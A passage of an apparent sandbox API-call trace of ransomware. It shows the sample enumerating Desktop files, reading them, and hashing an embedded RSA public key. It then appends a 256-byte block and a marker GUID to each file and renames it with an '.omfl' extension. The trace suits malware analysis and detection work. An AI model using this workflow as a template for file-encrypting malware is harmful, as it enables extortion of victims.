[0131.890] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.891] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x18f43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.891] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.891] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.891] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.891] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.892] CloseHandle (hObject=0x610) returned 1 [0131.896] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\kS 3v1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\ks 3v1.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\kS 3v1.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\ks 3v1.png.omfl")) returned 1 [0131.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.898] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0131.899] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8efed6e0, ftCreationTime.dwHighDateTime=0x1d5e49a, ftLastAccessTime.dwLowDateTime=0xe0497370, ftLastAccessTime.dwHighDateTime=0x1d5da95, ftLastWriteTime.dwLowDateTime=0xe0497370, ftLastWriteTime.dwHighDateTime=0x1d5da95, nFileSizeHigh=0x0, nFileSizeLow=0x13ed9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MU7k.jpg", cAlternateFileName="")) returned 1 [0131.899] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\MU7k.jpg") returned=".jpg" [0131.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\MU7k.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\mu7k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.900] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=81625) returned 1 [0131.900] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.903] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x13eb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.903] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.905] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x13ed9, lpOverlapped=0x0) returned 1 [0131.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.907] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.908] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.908] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.908] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.908] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.908] GetLastError () returned 0x0 [0131.908] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.908] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.909] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.909] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.909] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.909] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172c8 | out: hHeap=0x4970000) returned 1 [0131.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172e0 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172e0 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd172c8 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172e0 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd172c8 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.910] GetCurrentThreadId () returned 0x618 [0131.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2e2c0 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.911] GetCurrentThreadId () returned 0x618 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172c8 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172e0 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd172b0 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172f8 [0131.913] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x13ed9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.913] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.914] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.914] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.914] CloseHandle (hObject=0x610) returned 1 [0131.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x74fb288 [0131.916] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\MU7k.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\mu7k.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\MU7k.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\mu7k.jpg.omfl")) returned 1 [0131.918] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d82ac0, ftCreationTime.dwHighDateTime=0x1d5d930, ftLastAccessTime.dwLowDateTime=0xec699a70, ftLastAccessTime.dwHighDateTime=0x1d5df4c, ftLastWriteTime.dwLowDateTime=0xec699a70, ftLastWriteTime.dwHighDateTime=0x1d5df4c, nFileSizeHigh=0x0, nFileSizeLow=0x17c63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W 4QcV_lOpjk.wav", cAlternateFileName="W4QCV_~1.WAV")) returned 1 [0131.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf8f0 [0131.919] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\W 4QcV_lOpjk.wav") returned=".wav" [0131.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\W 4QcV_lOpjk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\w 4qcv_lopjk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.919] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=97379) returned 1 [0131.919] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.922] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x17c3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.923] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x17c63, lpOverlapped=0x0) returned 1 [0131.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.924] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.925] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.925] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.925] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.926] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.926] GetLastError () returned 0x0 [0131.926] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.926] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.926] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.926] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.926] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.927] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.928] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x17c63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.928] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.928] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.928] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.928] 